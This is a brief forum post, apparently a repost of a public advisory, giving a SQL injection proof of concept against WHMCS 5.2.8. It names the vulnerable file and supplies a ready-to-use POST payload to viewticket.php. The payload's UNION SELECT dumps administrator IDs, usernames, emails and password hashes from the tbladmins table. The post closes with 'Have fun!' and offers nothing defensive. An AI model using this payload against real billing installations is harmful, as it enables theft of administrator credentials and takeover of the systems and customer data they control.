Shelo Posted February 27, 2014 Report Posted February 27, 2014 Vulnerable file: /includes/dbfunctions.phpPOC:select_query() function is vulnerable due to Register GlobalsExample:/whmcs/viewticket.phpPOST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#Have fun!Sursa: WHMCS 5.2.8 - SQL Injection Vulnerability Quote